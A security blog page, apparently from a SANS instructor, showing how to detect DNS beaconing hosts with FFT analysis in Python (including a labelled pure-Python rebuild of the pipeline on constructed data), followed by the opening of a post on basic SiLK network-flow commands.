src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Oe7n1MLu_lyyNNGmAcP2a9KR0VzSZf3MXRYef5MBjw7Ud83k7lPAJ9yQZUIYOVTPOH2xTk9K4W6DOB2dhrBnj9Iy92zWvzzvOO30Fdxu5IvyH6nqGvGxcG9daSq9QnYTsmwjorhYeQQ47O6Xw7z-MUwy0PeVW17d6SrfXdqv06RlHV78baOiFdqoy-E/w640-h494/frequency%20symmetry%20broken.png" width="640" /></a></div><div><br /></div><div><div>Compute the FFT values returned for the counts per second</div></div><div>Use the sampling period of 3600</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre 
style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">fft = abs(np.fft.rfft(counts_per_period))
dvalue = int(best_period.rstrip("s"))
frequencies = np.fft.rfftfreq(n=len(counts_per_period), d=dvalue/sampling_period)
# Print the first 10 entries
frequencies[:10]
array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])
</span></div><div><br /></div></pre></div></div></div><div><br /></div></div><div><div>Get any signal spikes over CONST * stdev over the rest of the noise. This will be the interesting stuff to look at. The amplitudes (y-values) come from the FFT array found above.</div><div><br /></div><div>Find the standard deviation of the remaining data, so we can use it to find the strongest signals present. </div><div>Strip off the first 10% of the frequencies found, which will remove the DC component of the signal, leaving you with just the actual signal spikes.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><br /></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">print(f'Max frequency: {max(frequencies)}')
print(f'10% of the max frequency value: {0.1*max(frequencies)}')
print(f'Here are the frequencies - the lower 10%: \n\t {frequencies[frequencies > 0.1*max(frequencies)][:10]}')
Max frequency: 900.0
10% of the max frequency value: 90.0
Here are the frequencies - the lower 10%:
[ 91. 92. 93. 94. 95. 96. 97. 98. 99. 100.]</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div></div><div><div>With the above being made clear, save these new frequencies to a variable</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">stripped_frequencies = frequencies[ frequencies > 0.1 * max(frequencies) ]</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
# Print the first 10 entries
stripped_frequencies[:10]
array([ 91., 92., 93., 94., 95., 96., 97., 98., 99., 100.])</span></pre></div></div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">print(f'[*] Size of stripped frequencies: {stripped_frequencies.size}')</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111;"><span style="color: white;">print(f'[*] Length of the fft transformed data: {len(fft)}')
print(f'[*] New FFT: {fft[len(fft) - stripped_frequencies.size:][:10]}')
[*] Size of stripped frequencies: 810
[*] Length of the fft transformed data: 901
[*] New FFT: [1143.47208739 473.94896724 304.70114392 420.31706819 219.34075832
581.26586592 572.50777759 136.43847641 1108.424958 1136.18872268]</span></span></div></pre></div></div></div><div><br /></div></div><div><div>Get the stripped FFT. Print the first 10 entries</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">stripped_fft = fft[len(fft) - stripped_frequencies.size:]</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
stripped_fft[:10]
array([1143.47208739, 473.94896724, 304.70114392, 420.31706819,
219.34075832, 581.26586592, 572.50777759, 136.43847641,
1108.424958 , 1136.18872268])</span></pre></div></div><div><br /></div></div><div><div>Leverage descriptive statistics. Get the standard deviation</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">std_dev = np.std(stripped_fft)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
# Get the mean
mean = np.mean(stripped_fft)
# Set a threshold
threshold = mean + 2*std_dev
print(f'Standard Deviation: {std_dev} | Mean: {mean} | Threshold: {threshold}')
<br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
Standard Deviation: 240.6914745391128 | Mean: 369.67931016529883 | Threshold: 851.0622592435244</span></pre></div></div></div><div><br /></div></div><div>Add the strong signals to a list</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">1./sampling_period</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;"><br /></span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">strong_signals = []
for signal in stripped_fft:
    if (signal > threshold):
        # print(f"adding signal: {str(signal)}")
        strong_signals.append(signal)
# Print the first 10 entries
strong_signals[:10]
[1143.4720873935075,
1108.4249580037538,
1136.188722679384,
978.1350685678566,
1309.8618870200787,
1265.7223903589352,
1214.0629560494137,
1747.6746509763254,
1440.277194109987,
1079.5542043630226]</span></div></pre></div></div></div><div><br /></div><div>Plot the frequency data after removing the DC component</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">fig = px.line(</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"> x=stripped_frequencies,
y=(abs(stripped_fft)),
labels=dict(x="Frequency (cycle/sec)", y="Connection Information"),
title="Connection Information by Frequency With DC Removed; Sampling Period: " + best_period
)
fig.show()</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUubMhklB4as8zWQaG-CMya5_03NVQkS8bO0NJOVeP0U1cvEuhKWaGt3LlqAigBfk6c4OXzpxCVXCL_73PxlEjnU0fOo2SO-S1YLtHreGKLguXBPYhtctFsKPiepY3Ju3rd8x_3qyjJRilssSG-0-pTHy4zN5dx6D8DhZxB-Gdg2gaA2NMGhn_k-7tgdg/s1138/Fourier%20-%20DC%20offset%20removed.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUubMhklB4as8zWQaG-CMya5_03NVQkS8bO0NJOVeP0U1cvEuhKWaGt3LlqAigBfk6c4OXzpxCVXCL_73PxlEjnU0fOo2SO-S1YLtHreGKLguXBPYhtctFsKPiepY3Ju3rd8x_3qyjJRilssSG-0-pTHy4zN5dx6D8DhZxB-Gdg2gaA2NMGhn_k-7tgdg/w640-h253/Fourier%20-%20DC%20offset%20removed.png" width="640" /></a></div><div>For each strong signal: find the array index from the FFT array</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">signal_indices = []</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">i = 0
while (i < len(strong_signals)):
    matching_index = np.where(fft == np.float64(strong_signals[i]))[0][0]
    #print(f'Matching Index: {matching_index}')
    signal_indices.append(matching_index)
    i += 1
signal_indices[:10]
[91, 99, 100, 103, 104, 105, 106, 107, 108, 109]</span></pre></div></div><div><br /></div></div><div><div>Create a new array of the same size as the FFT array. Zero it out, except for the indices you just found, which are the strong signals we want to find the times for.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">strong_signal_frequencies = np.zeros(len(fft))</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">for index in signal_indices:
    strong_signal_frequencies[index] = frequencies[index]
strong_signal_amplitudes = np.zeros(len(fft))
for index in signal_indices:
    strong_signal_amplitudes[index] = fft[index]</span></pre></div></div></div><div><br /></div><div><div>Graph the data in the time domain using the 2-second sampling period. We can clearly see spikes of interest below.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">fig = px.line(</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"> counts_per_period,
labels=dict(x="Timestamp", y="DNS Log Information"),
title="DNS By Timestamp; Sampling Period: " + best_period
)
fig.show()</span></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJiz5PzNp0j7fKHLKJY1weCxTcBuSpece1BJWdvUXN8rQQmXW-6BV8bHgPlpLTjef0RVfAjbXazMT60XtA8wALFv7cq1DzKws4rM7Yj8mBuVswxwrb6wkMCohNuWWLIHGfqDsbsCFAO50dhs2U03k7S1EAgT09F1hmoWP5AhiQwPVzoXJXLDYmDeQGRU/s571/samples%20in%202%20seconds%20window.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="571" height="510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJiz5PzNp0j7fKHLKJY1weCxTcBuSpece1BJWdvUXN8rQQmXW-6BV8bHgPlpLTjef0RVfAjbXazMT60XtA8wALFv7cq1DzKws4rM7Yj8mBuVswxwrb6wkMCohNuWWLIHGfqDsbsCFAO50dhs2U03k7S1EAgT09F1hmoWP5AhiQwPVzoXJXLDYmDeQGRU/w640-h510/samples%20in%202%20seconds%20window.png" width="640" /></a></div><div><div><br /></div><div>De-noise the data by filtering. Make an effective bandpass filter by zeroing out all the frequencies except the strong ones found above. 
Plot just the strong signal frequencies vs their amplitudes.</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIW9_a0CclunytW6JDmsa1NyK921vOEYxYnTNR_2B6IeXL1XVtR9NRWa3D2obYYgIzd65Xo4snDJgPv_NfN1uZiQC4NntCx81H5B2yxY_ghebccD1RKXluHNBqMnmPgdE0b_-IlqC622JguJfIlu3YitgE_rn4wwwbUtPKUDSN4C70ICxmb7oT7KEjQmM/s1138/samples%20in%202%20seconds%20window%20-%20noise%20removed.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIW9_a0CclunytW6JDmsa1NyK921vOEYxYnTNR_2B6IeXL1XVtR9NRWa3D2obYYgIzd65Xo4snDJgPv_NfN1uZiQC4NntCx81H5B2yxY_ghebccD1RKXluHNBqMnmPgdE0b_-IlqC622JguJfIlu3YitgE_rn4wwwbUtPKUDSN4C70ICxmb7oT7KEjQmM/w640-h253/samples%20in%202%20seconds%20window%20-%20noise%20removed.png" width="640" /></a></div><div>Use the Inverse FFT to flip just the strong signals back to time-domain</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">inverse_fft = np.fft.irfft(strong_signal_amplitudes, len(counts_per_period))</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
fig = px.line(
x=counts_per_period.to_frame().index,
y=inverse_fft,
labels=dict(x="Timestamp", y="DNS Log"),
title="Periodic Signal"
)
fig.show()</span></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp_Tn8kwIA4FzvHx00rBbuGHs3H6-oXzpzpOluGsxq6LlLqrBVA8zesNddmUNQ3tgoLrv7rj2wxjRp-MeNOoiZjgaFJNhEajOGvA5aE3A4phaddFRQJ2h3fNVCQJcyQJLBQbLNIVvO1VoLxK0rLamCmyT0y5YDn5k5wPLP7tlnH4qPmHDHq0EbcsV0xWA/s1138/plot%20back%20in%20time%20domain.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp_Tn8kwIA4FzvHx00rBbuGHs3H6-oXzpzpOluGsxq6LlLqrBVA8zesNddmUNQ3tgoLrv7rj2wxjRp-MeNOoiZjgaFJNhEajOGvA5aE3A4phaddFRQJ2h3fNVCQJcyQJLBQbLNIVvO1VoLxK0rLamCmyT0y5YDn5k5wPLP7tlnH4qPmHDHq0EbcsV0xWA/w640-h253/plot%20back%20in%20time%20domain.png" width="640" /></a></div><div><div><br /></div><div>OK. Now, for each of our strong signals, we need to identify domains from our original data set that had a count of DNS requests "near" our signal strengths. (It won't be spot-on, due to sample frequency bin width and signal jitter.) This will be the shortlist of IP for further investigation.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">shortlist = []</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">newdf = df_dns.groupby(['id.orig_h']).size().reset_index(name='counts')
for amplitude in strong_signals:
    shortlist.append(newdf[ (newdf['counts'] > (amplitude*0.8)) & (newdf['counts'] < (amplitude*1.2)) ])
results = pd.concat(shortlist, ignore_index=True)
#print(results)
results[['id.orig_h','counts']]
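# Added example (not code from the original notebook, nor from Joe Petroske's original
# work): the beacon-hunting pipeline of the cells above rebuilt in pure Python so it runs
# without numpy, pandas or plotly, on constructed dns.log-style rows. A naive O(N^2) real
# DFT stands in for np.fft.rfft/irfft; everything else follows the notebook: 2-second
# bins, threshold = mean + 2*std of the DC-removed spectrum, +/-20% count window for the
# shortlist. The host addresses, query names and timings are constructed. The printed
# table right after this block is the original cell's output.
```python
import cmath
import math
from collections import Counter

SAMPLING_PERIOD = 2.0  # seconds per bin, as in the notebook above


def make_dns_log(seconds=600):
    """Constructed dns.log-style rows (ts, id.orig_h, query); not real traffic.
    10.0.0.9 beacons every 4 s and 10.0.0.24 every 6 s.  10.0.0.55 queries
    every 2 s, exactly once per bin, so it is pure DC and disappears when the
    DC component is removed: a beacon at the sampling period is invisible."""
    rows = []
    for t in range(0, seconds, 4):
        rows.append((float(t), "10.0.0.9", "somedomain.securitynik.local"))
    for t in range(0, seconds, 6):
        rows.append((float(t), "10.0.0.24", "beacon-b.example"))
    for t in range(0, seconds, 2):
        rows.append((float(t), "10.0.0.55", "heartbeat.example"))
    rows.sort()
    return rows


def bin_counts(rows, period=SAMPLING_PERIOD):
    """counts_per_period: number of rows in each period-second bin."""
    n_bins = int(math.ceil((max(ts for ts, _, _ in rows) + period) / period))
    counts = [0] * n_bins
    for ts, _, _ in rows:
        counts[int(ts // period)] += 1
    return counts


def rfft_naive(x):
    """Real-input DFT in np.fft.rfft layout (bins 0..N//2); O(N^2) but dependency-free."""
    n = len(x)
    spectrum = []
    for k in range(n // 2 + 1):
        acc = 0j
        for t, v in enumerate(x):
            acc += v * cmath.exp(-2j * math.pi * ((k * t) % n) / n)
        spectrum.append(acc)
    return spectrum


def strong_bins(spectrum, n_std=2.0):
    """Drop DC, then keep bins whose magnitude exceeds mean + n_std*std
    (population std, numpy's default).  Returns [(bin, magnitude)], threshold.
    Carrying the bin index avoids the float-equality lookup the notebook does."""
    mags = [abs(v) for v in spectrum[1:]]
    mean = sum(mags) / len(mags)
    std = math.sqrt(sum((m - mean) ** 2 for m in mags) / len(mags))
    threshold = mean + n_std * std
    return [(i + 1, m) for i, m in enumerate(mags) if m > threshold], threshold


def bandpass_to_time(spectrum, strong, n):
    """Zero all bins except the strong ones and invert, like np.fft.irfft:
    DC and Nyquist count once, every other bin twice (Hermitian symmetry)."""
    keep = {k: spectrum[k] for k, _ in strong}
    signal = []
    for t in range(n):
        acc = 0.0
        for k, v in keep.items():
            weight = 1 if k == 0 or (n % 2 == 0 and k == n // 2) else 2
            acc += weight * (v * cmath.exp(2j * math.pi * ((k * t) % n) / n)).real
        signal.append(acc / n)
    return signal


def shortlist_hosts(rows, strong, low=0.8, high=1.2):
    """Hosts whose total query count is within (low, high) x a strong amplitude,
    the notebook's +/-20% window.  Returns (host, count, amplitude) triples."""
    totals = Counter(host for _, host, _ in rows)
    hits = []
    for _, amp in strong:
        for host, count in sorted(totals.items()):
            if amp * high > count > amp * low:
                hits.append((host, count, round(amp, 3)))
    return hits


def hunt(rows):
    """Whole pipeline; returns the pieces the notebook plots or prints."""
    counts = bin_counts(rows)
    spectrum = rfft_naive(counts)
    strong, threshold = strong_bins(spectrum)
    return {"counts_per_period": counts, "threshold": threshold, "strong": strong,
            "periodic_signal": bandpass_to_time(spectrum, strong, len(counts)),
            "shortlist": shortlist_hosts(rows, strong)}


if __name__ == "__main__":
    result = hunt(make_dns_log())
    print("threshold:", round(result["threshold"], 2))
    print("strong bins:", [(k, round(m, 1)) for k, m in result["strong"]])
    print("shortlist:", result["shortlist"])
```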
id.orig_h counts
0 10.0.0.24 1927
1 10.0.0.9 1770</span></pre></div></div></div><div><br /></div></div><div><div>Just as we expected, this started off with us recognizing via <i>tcpdump </i>that the host at 10.0.0.9 is sending beacons every two seconds. Not only are we able to find that host but we also are seeing another host that is exhibiting similar behaviour. Let's now go back into our <i>Pandas DataFrame</i> and isolate traffic from these two hosts.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">df_dns[(df_dns['id.orig_h'] == '10.0.0.9') | (df_dns['id.orig_h'] == '10.0.0.24') ]</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
ts id.orig_h id.orig_p id.resp_h query
21 2023-10-01 01:00:00 10.0.0.9 40520 10.0.0.2 somedomain.securitynik.local
28 2023-10-01 01:00:00 10.0.0.24 41626 10.0.0.2 assets-sncust.securitynik.com
29 2023-10-01 01:00:00 10.0.0.24 39327 10.0.0.2 assets-sncust.securitynik.com
35 2023-10-01 01:00:02 10.0.0.9 33415 10.0.0.2 somedomain.securitynik.local
37 2023-10-01 01:00:03 10.0.0.24 61312 10.0.0.2 s.update.3lift.com
... ... ... ... ... ...
8194 2023-10-01 01:59:45 10.0.0.24 5353 224.0.0.251 _googlecast._tcp.local
8209 2023-10-01 01:59:56 10.0.0.9 55148 10.0.0.2 somedomain.securitynik.local
8214 2023-10-01 01:59:58 10.0.0.9 40965 10.0.0.2 somedomain.securitynik.local
8215 2023-10-01 01:59:59 10.0.0.24 36625 10.0.0.2 i.ytimg.com
8216 2023-10-01 01:59:59 10.0.0.24 58969 10.0.0.2 youtubei.googleapis.com
3697 rows × 5 columns</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div></div><div><div>At this point, we can convert this notebook to a python script that we can run in our environment.</div><div>See you in an upcoming <a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/" target="_blank">SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals</a></div><div>Also once again, big thanks to Joe Petroske for doing the initial heavy lifting.</div></div><div><br /></div><div><div>Some other helpful links/references</div><div><a href="https://realpython.com/python-scipy-fft/">https://realpython.com/python-scipy-fft/</a></div><div><a href="https://towardsdatascience.com/fourier-transform-the-practical-python-implementation-acdd32f1b96a">https://towardsdatascience.com/fourier-transform-the-practical-python-implementation-acdd32f1b96a</a></div><div><a href="https://pythonnumericalmethods.berkeley.edu/notebooks/chapter24.00-Fourier-Transforms.html">https://pythonnumericalmethods.berkeley.edu/notebooks/chapter24.00-Fourier-Transforms.html</a></div><div><br /></div><div><a href="https://ocw.mit.edu/courses/6-003-signals-and-systems-fall-2011/12e6e5d7567fca2e993ef8563fef5a60_MIT6_003F11_lec21.pdf">https://ocw.mit.edu/courses/6-003-signals-and-systems-fall-2011/12e6e5d7567fca2e993ef8563fef5a60_MIT6_003F11_lec21.pdf</a></div><div><a href="https://dsp.stackexchange.com/questions/30552/sampling-rate-vs-sampling-time-of-fft">https://dsp.stackexchange.com/questions/30552/sampling-rate-vs-sampling-time-of-fft</a></div><div><a href="https://electronics.stackexchange.com/questions/12407/what-is-the-relation-between-fft-length-and-frequency-resolution">https://electronics.stackexchange.com/questions/12407/what-is-the-relation-between-fft-length-and-frequency-resolution</a></div><div><a 
href="https://eeweb.engineering.nyu.edu/~yao/EE3054/Ch12.3_sampling.pdf">https://eeweb.engineering.nyu.edu/~yao/EE3054/Ch12.3_sampling.pdf</a></div><div><a href="https://www.eecs.umich.edu/courses/eecs206/archive/f02/public/lec/lect20.pdf">https://www.eecs.umich.edu/courses/eecs206/archive/f02/public/lec/lect20.pdf</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-67301630351401015082023-10-02T10:20:00.005-07:002023-10-02T10:23:53.089-07:00Beginning SiLK - Systems for Internet Level Knowledge - working with network flow data<p>SiLK is one of the tools used to analyze network flow data and something we teach in the <a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/" target="_blank">SANS SEC503, Network Monitoring and Threat Detection</a>. In this post, I walk through some of the tools within the SiLK suite to show their basic and fairly common usage. There is no specific order to their usage, and at times you may see the same tool used multiple times in different ways.</p><p>Get the SiLK version, compile information, etc. via <b><i>silk_config</i></b>.</p><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">silk_config</span></b></span>
<span style="color: white;">silk-version: 3.19.2</span>
<span style="color: white;">compiler: gcc</span>
<span style="color: white;">cflags: -I/usr/local/include -DNDEBUG -D_ALL_SOURCE=1 -D_GNU_SOURCE=1 -I/usr/local/include -I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -fno-strict-aliasing -O3</span>
<span style="color: white;">include: -I/usr/local/include -DNDEBUG -D_ALL_SOURCE=1 -D_GNU_SOURCE=1 -I/usr/local/include -I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include</span>
<span style="color: white;">libsilk-libs: -L/usr/local/lib -lsilk -lz -lm</span>
<span style="color: white;">libsilk-thrd-libs: -L/usr/local/lib -lsilk-thrd -lsilk -lz -lm</span>
<span style="color: white;">libflowsource-libs: -L/usr/local/lib -lflowsource -lsilk-thrd -lsilk -L/usr/local/lib -lfixbuf -lpthread -lgthread-2.0 -pthread -lglib-2.0 -lz -lm</span>
<span style="color: white;">data-rootdir: /data</span>
<span style="color: white;">python-site-dir: /usr/lib/python3/dist-packages</span>
</pre></td></tr></tbody></table></div>
</div><p>Get information about the sensors in the site via <i><b>rwsiteinfo</b></i>.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwsiteinfo --fields sensor,describe-sensor</span></b></span>
<span style="color: white;"> Sensor| Sensor-Description|</span>
<span style="color: white;"> Internal| Backbone ERS|</span>
<span style="color: white;">Perimeter| Perimeter collector|</span>
<span style="color: white;"> ERS|Avaya ERS Switch Stack|</span>
<span style="color: white;"> internal| STIFortunes|</span>
</pre></td></tr></tbody></table></div>
<p>A different view of the sensor information, as a single comma-separated list.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwsiteinfo --fields=sensor:list</span></b></span>
<span style="color: white;"> Sensor:list|</span>
<span style="color: white;">Internal,Perimeter,ERS,internal|</span>
</pre></td></tr></tbody></table></div>
<p>Get information about a particular sensor via <i><b>rwsiteinfo</b></i>: the flow types it collects and, for each type, the number of files in the repository and the dates of the first and last file.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwsiteinfo --sensor=Internal --fields type,repo-file-count,repo-start-date,repo-end-date</span></b></span>
<span style="color: white;"> Type|File-Count| Start-Date| End-Date|</span>
<span style="color: white;"> in| 5828|2018/10/01T17:00:00|2022/07/03T19:00:00|</span>
<span style="color: white;"> out| 5093|2018/10/01T01:00:00|2022/07/03T19:00:00|</span>
<span style="color: white;"> inweb| 5059|2018/10/04T22:00:00|2022/07/03T19:00:00|</span>
<span style="color: white;"> outweb| 1781|2018/10/03T08:00:00|2019/05/03T14:00:00|</span>
<span style="color: white;"> ...</span>
</pre></td></tr></tbody></table></div>
<p>Get information on <i>classes</i>, <i>types</i> and their <i>default</i> values. A "<code>+</code>" marks rows belonging to the default class and a "<code>*</code>" marks rows for a default type.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsiteinfo --sensor=Perimeter --fields class,type,mark-default</span></b></span>
<span style="color: white;">Class| Type|Defaults|</span>
<span style="color: white;"> all| in| +*|</span>
<span style="color: white;"> all| out| +*|</span>
<span style="color: white;"> all| inweb| +*|</span>
<span style="color: white;"> all| outweb| +*|</span>
</pre></td></tr></tbody></table></div>
